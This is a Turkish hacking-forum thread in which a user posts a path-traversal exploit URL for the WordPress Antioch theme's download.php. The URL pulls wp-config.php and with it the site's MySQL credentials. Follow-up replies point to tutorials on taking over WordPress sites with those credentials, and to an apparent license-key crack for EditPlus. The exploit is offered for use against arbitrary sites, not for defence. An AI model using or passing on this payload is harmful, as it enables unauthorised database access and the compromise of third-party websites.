Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,363 / 1,363
Deneyim: 54 / 100
Rep Sayısı: 2722
Mesaj Sayısı: 6201
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
29.09.2014 12:16



Kod:
Exploitin Orjinal İsmi => Wordpress Antioch Theme Arbitrary File Download
Vulnerability => Türkçesi => WordPress Antioch Teması Rasgele Dosya İndirme Açığı

Uygulanacak Exploit =>
[SİTEİSMİ]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php

Açıklama site içerisindeki wp-config.php yani sitede MySQL Veritabanın admin kullanıcı adı ve şifresini indiribiliyorsunuz.

Not => revslider.php açığına benzediği için ona göre bir video ekledim
Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,048 / 1,048
Deneyim: 95 / 100
Rep Sayısı: 1020
Mesaj Sayısı: 2983
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
29.09.2014 12:17
eline sağlık

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
Sylar
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 2
Yaşam Puanı: 0 / 37
Deneyim: 50 / 100
Rep Sayısı: 0
Mesaj Sayısı: 14
Üyelik Tarihi: 30.01.2015
     
Yorum: #3
Cvp: Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
30.01.2015 22:30
Hocam merhaba, peki indirdigimiz config bilgileri ile mysql nasil ulasacagiz ?
Alinti
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,363 / 1,363
Deneyim: 54 / 100
Rep Sayısı:
Mesaj Sayısı: 6201
Üyelik Tarihi: 21.08.2013
     
Yorum: #4
RE: Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
30.01.2015 22:58
(30.01.2015 22:30)Sylar Nickli Kullanıcıdan Alıntı:  Hocam merhaba, peki indirdigimiz config bilgileri ile mysql nasil ulasacagiz ?

Forumda bunu çok kez anlattım - İyice araştırmanız lazım.Ama ben yinede hepsini topluyum bir araya siz bakarsınız Smile

Wp-Config.php Görünümü

cyberizm

Bu tür WordPress siteler Nasıl Hacklenir

Wp-Config Okuyarak Hack Resimli Anlatım

Kod:
http://www.cyberizm.org/cyberizm-config-okuyarak-hack-resimli-anlatim.html

Wp-Config Hacking Geniş Anlatım

Kod:
http://www.cyberizm.org/cyberizm-wordpress-config-cekme-okuma-heykleme-ayrintili-anlatim.html

Wp-Config.php Hakkında Geniş bilgi

Kod:
http://www.cyberizm.org/cyberizm-wordpress-mysql-veritabani-wp-config-php-dosyasi.html

Not => Sitelerin Wp-Config.php dosyalarının MySQL Kullanıcı Adı ve Şifresi içermektedir.

Not 2 => EditPlus Programı ile daha kolay rahat görebilirsiniz.
Kod:
www.cyberizm.org/cyberizm-editplus-serial-registration-key-license-key.html
Alinti



1 Ziyaretçi